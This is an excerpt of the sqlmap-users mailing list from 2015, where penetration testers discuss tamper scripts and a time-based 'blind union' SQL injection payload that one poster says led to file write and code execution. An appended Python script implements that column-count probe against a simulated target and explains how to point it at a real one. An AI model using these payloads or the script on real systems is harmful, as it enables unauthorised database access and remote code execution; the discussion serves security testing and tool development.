> http://pubads.g.doubleclick.net/gampad/clk?id=241902991&iu=/4140
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website |
From: Vincent M. <vi...@ma...> - 2015-09-16 15:23:58
|
Hi,

I am new to tamper scripts and I have to forge some custom headers to pass an API authentication.
I need to get the HTTP method (GET, POST, ...) used by the next sqlmap request and the exact URL that will be used.

For example, in this header:
[17:06:22] [TRAFFIC OUT] HTTP request [#35]:
GET /1.0/iot/app/SQLIHERE HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: identity
Pragma: no-cache
Cache-control: no-cache,no-store
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0-dev-c59ead3 (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7

I want to be able to get the first line: GET /1.0/iot/app/SQLIHERE
From this line, I would be able to parse for the method and get the URI that I will *statically* concat with the base URL of the API.

So far I have managed to compute the auth header and use sqlmap to test the API but I have to update my tamper script for each different endpoint (URI).

Thanks for your help. |
From: Brandon P. <bpe...@gm...> - 2015-09-15 13:46:45
|
On Tue, Sep 15, 2015 at 6:54 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> A) As I see this "hybrid", you are proposing it as a way to do the "UNION"
> based file write (INTO DUMPFILE).
>
> B) Incorporating this "hybrid" technique into the standard tests would be
> uberkill (from my perspective). I have a feeling that at least the
> "time-based" injection would be detected in this kind of cases, so making
> the "UNION" tests carrying the SLEEP would just detect the same thing (but
> with usage of UNION technique), but with more requests.

You are correct, the other time based payloads were detected correctly.

> So, to go back to the A). sqlmap already tries to use the "INTO OUTFILE
> ... LINES TERMINATED" in non-UNION cases. Making post-detection tests for
> number of columns is doable in the "file-write" phase, but I am not
> convinced that it would do more good than the number of requests required
> (as ORDER BY is expected to be unusable, we would need to pick the number
> of columns incrementally).

I didn't realise sqlmap would try this; I thought it required a UNION-based detection before trying. I can play around with this.

> Thoughts?
>
> Kind regards
>
> On Fri, Sep 11, 2015 at 8:43 PM, Brandon Perry <bpe...@gm...> wrote:
>
>> I have had this idea for a while, and I finally came across an injection
>> that this was useful for me.
>>
>> Due to logic in the application, a generic UNION tacked on the end of the
>> query doesn't work.
>>
>> However, a payload of:
>>
>> blah=foo"+union+select+null,null,null,null,sleep(5)--%20
>>
>> does result in a response coming back 5 seconds later than the baseline.
>> Removing or adding a column to the union results in the baseline request
>> time.
>>
>> This was very useful for me, because I was able to use this 'blind union'
>> in order to write a file to the web root and achieve RCE, even though the
>> union in and of itself would not let me pull data out en masse (the other
>> time based payloads did work as well).
>>
>> This might be a useful check for sqlmap to implement. Currently, there
>> are heuristics that sqlmap has to determine whether an injection point is
>> union-able, but not exploitable with generic NULL/union char payloads. I
>> think this is determined by the HTTP response data though, not the temporal
>> aspect of the HTTP response.
>>
>> Thoughts?
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>> ------------------------------------------------------------------------------
>>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website |
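Brandon's "blind union" check from the thread above as a small Python script: probe increasing column counts with `union select null,...,sleep(n)`, watch the response time, and confirm a hit by doubling the sleep, since only the matching column count lets SLEEP() run. This is an added example, not sqlmap's detection code and not Brandon's payload verbatim. The target is a constructed in-process stand-in (`FakeTarget`) that behaves as the thread describes; the sleep is shortened from the mail's 5 s to 0.2 s so the script finishes quickly; and the 80% threshold, three samples per probe and ten-column cap are my choices. The incremental search is exactly the request cost Miroslav points out when ORDER BY is unusable.

```python
import re
import statistics
import time
from urllib.parse import unquote_plus

SLEEP_SECONDS = 0.2   # the mail used sleep(5); shortened so the script runs quickly
MAX_COLUMNS = 10      # upper bound for the incremental column search (my choice)
SAMPLES = 3           # timings per probe; the median ignores one jittery response


def union_sleep_payload(columns, sleep_seconds=SLEEP_SECONDS):
    """The 'blind union' payload from the thread: a double quote to close the
    string literal, NULL for every column but the last, SLEEP() in the last,
    and a comment to swallow the rest of the query. Spaces are sent as '+'."""
    if columns < 1:
        raise ValueError("need at least one column")
    cells = ["null"] * (columns - 1) + ["sleep(%s)" % sleep_seconds]
    return '"+union+select+' + ",".join(cells) + "--%20"


class FakeTarget:
    """Constructed stand-in for the vulnerable application (no network).

    The original query returns `columns` columns, so a UNION with any other
    count fails before execution (MySQL: "The used SELECT statements have a
    different number of columns") and SLEEP() never runs; with the right
    count the row is built and SLEEP() delays the response. Every request
    costs `baseline` seconds regardless."""

    def __init__(self, columns, baseline=0.01):
        self.columns = columns
        self.baseline = baseline

    def request(self, value):
        """Return the response time in seconds for parameter value `value`."""
        start = time.monotonic()
        time.sleep(self.baseline)
        decoded = unquote_plus(value)          # the server decodes '+' and %20
        m = re.search(r"union\s+select\s+(.+?)--", decoded, re.I | re.S)
        if m:
            cells = [c.strip() for c in m.group(1).split(",")]
            if len(cells) == self.columns:
                s = re.search(r"sleep\(([\d.]+)\)", cells[-1], re.I)
                if s:
                    time.sleep(float(s.group(1)))
        return time.monotonic() - start


def measure(target, value, samples=SAMPLES):
    """Median response time over several requests. Inferring from a single
    timing is what yields the wrong characters Miroslav warns about in the
    threading thread; the median survives one slow outlier."""
    return statistics.median(target.request(value) for _ in range(samples))


def find_union_columns(target, max_columns=MAX_COLUMNS, sleep_seconds=SLEEP_SECONDS):
    """Return the column count at which the SLEEP() probe is delayed, or None.

    ORDER BY is assumed unusable, so counts are tried one by one. A hit is
    confirmed by doubling the sleep: a delay that does not scale with the
    SLEEP() argument is load or jitter, not injection."""
    baseline = measure(target, "1")
    threshold = baseline + 0.8 * sleep_seconds
    for n in range(1, max_columns + 1):
        if measure(target, union_sleep_payload(n, sleep_seconds)) < threshold:
            continue
        confirm = measure(target, union_sleep_payload(n, 2 * sleep_seconds))
        if confirm >= baseline + 0.8 * 2 * sleep_seconds:
            return n
    return None


if __name__ == "__main__":
    target = FakeTarget(columns=5)          # constructed: the real query has 5 columns
    print("blind union column count:", find_union_columns(target))
```

Against a real target, `FakeTarget.request` would be replaced by an HTTP call that returns the elapsed time, and the baseline should be re-measured periodically: the technique is only as reliable as the gap between SLEEP() and the target's natural variance, which is also why running it threaded (several SLEEP() probes in flight at once) both muddies the timings and, with heavy queries, turns the check into a denial of service.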